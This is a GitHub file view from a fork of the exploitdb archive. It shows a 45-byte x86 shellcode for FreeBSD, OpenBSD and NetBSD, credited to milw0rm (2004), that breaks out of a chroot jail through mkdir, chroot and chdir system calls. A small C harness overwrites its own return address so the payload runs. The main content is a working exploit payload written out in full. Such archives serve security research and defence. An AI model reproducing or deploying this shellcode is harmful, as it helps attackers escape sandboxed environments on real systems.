forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path13250.c
More file actions
executable file
·48 lines (41 loc) · 1.89 KB
/
Copy path13250.c
File metadata and controls
executable file
·48 lines (41 loc) · 1.89 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
/*
*BSD version
FreeBSD, OpenBSD, NetBSD.
s0t4ipv6@shellcode.com.ar
45 bytes.
-break chrooted
*/
char shellcode[]=
"\x68\x62\x2e\x2e\x2e" /* pushl $0x2e2e2e62 */
"\x89\xe7" /* movl %esp,%edi */
"\x33\xc0" /* xorl %eax,%eax */
"\x88\x47\x03" /* movb %al,0x3(%edi) */
"\x57" /* pushl %edi */
"\xb0\x88" /* movb $0x88,%al */
"\x50" /* pushl %eax */
"\xcd\x80" /* int $0x80 */
"\x57" /* pushl %edi */
"\xb0\x3d" /* movb $0x3d,%al */
"\x50" /* pushl %eax */
"\xcd\x80" /* int $0x80 */
"\x47" /* incl %edi */
"\x33\xc9" /* xorl %ecx,%ecx */
"\xb1\xff" /* movb $0xff,%cl */
"\x57" /* pushl %edi */
"\x50" /* pushl %eax */
"\xb0\x0c" /* movb $0x0c,%al */
"\xcd\x80" /* int $0x80 */
"\xe2\xfa" /* loop <shellcode +31> */
"\x47" /* incl %edi */
"\x57" /* pushl %edi */
"\xb0\x3d" /* movb $0x3d,%al */
"\x50" /* pushl %eax */
"\xcd\x80"; /* int $0x80 */
main()
{
int *ret;
printf("Shellcode lenght=%d\n",sizeof(shellcode));
ret=(int*)&ret+2;
(*ret)=(int)shellcode;
}
// milw0rm.com [2004-09-26]